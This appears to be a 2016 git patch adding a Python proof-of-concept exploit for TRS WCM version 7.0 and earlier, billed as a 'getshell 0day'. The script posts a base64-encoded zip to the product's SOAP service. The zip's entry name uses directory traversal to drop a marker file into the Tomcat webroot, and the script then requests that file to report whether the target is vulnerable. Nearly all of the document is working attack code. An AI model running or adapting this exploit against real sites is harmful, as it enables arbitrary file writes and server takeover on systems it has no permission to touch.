From 0f9bb85c91c88b7f834b43f7b6dd06746ffdd083 Mon Sep 17 00:00:00 2001 From: cfhb <759601966@qq.com> Date: Tue, 22 Mar 2016 21:39:54 +0800 Subject: [PATCH] Create TRS_WCM_POC.py TRS_WCM <=7.0 getshell --- TRS_WCM_POC.py | 40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 TRS_WCM_POC.py diff --git a/TRS_WCM_POC.py b/TRS_WCM_POC.py new file mode 100644 index 0000000..ee6491a --- /dev/null +++ b/TRS_WCM_POC.py @@ -0,0 +1,40 @@ +#!encoding=utf-8 +# +# Plugin Name:TRS wcm <=7 getshell 0day +# Author :CF_HB +# Date :2016/3/20 +#http://www.wooyun.org/bugs/wooyun-2015-0162315 + +import sys +import requests as req +def CheckVulns(url): + headers = {'content-type': 'application/json','SOAPAction':'""'} + if "http" not in url: + print "usage: python %s http://test.com" % sys.argv[0] + else: + SEND_URL = url+"/wcm/services/trswcm:SOAPService" + key_url = url+"/wcm/A37D5BB7D3A6EFD298678084E770D3BF.txt" + key_hash = "This_site_is_vulnerable!" + post_data = 'UEsDBAoAAAAAADO+cUgnPmdlGAAAABgAAABGAAAALi4vLi4vLi4vLi4vLi4vVG9tY2F0L3dlYmFwcHMvd2NtL0EzN0Q1QkI3RDNBNkVGRDI5ODY3ODA4NEU3NzBEM0JGLnR4dFRoaXNfc2l0ZV9pc192dWxuZXJhYmxlIVBLAQI/AAoAAAAAADO+cUgnPmdlGAAAABgAAABGACQAAAAAAAAAIAAAAAAAAAAuLi8uLi8uLi8uLi8uLi9Ub21jYXQvd2ViYXBwcy93Y20vQTM3RDVCQjdEM0E2RUZEMjk4Njc4MDg0RTc3MEQzQkYudHh0CgAgAAAAAAABABgABgFum2SA0QEi9oRyZIDRASL2hHJkgNEBUEsFBgAAAAABAAEAmAAAAHwAAAAAAA==.zip' + #exploiting.... + req.post(SEND_URL, data=post_data,headers=headers) + #checking..... + resp2 = req.get(key_url) + if resp2.status_code ==200: + if key_hash in resp2.content: + mesg = "%s is vulnerable" % sys.argv[1] + showUrl="openUrl: "+key_url + print "\n" + print '.'*(len(mesg)+2) + print "."+mesg+"." + print "."+showUrl+"." + print '.'*(len(mesg)+2) + else: + print "something wrong!" + else: + print "%s is not vulnerable" % sys.argv[0] +if __name__ == '__main__': + if len(sys.argv)!=2: + print "usage: python %s url " % sys.argv[0] + else: + CheckVulns(sys.argv[1])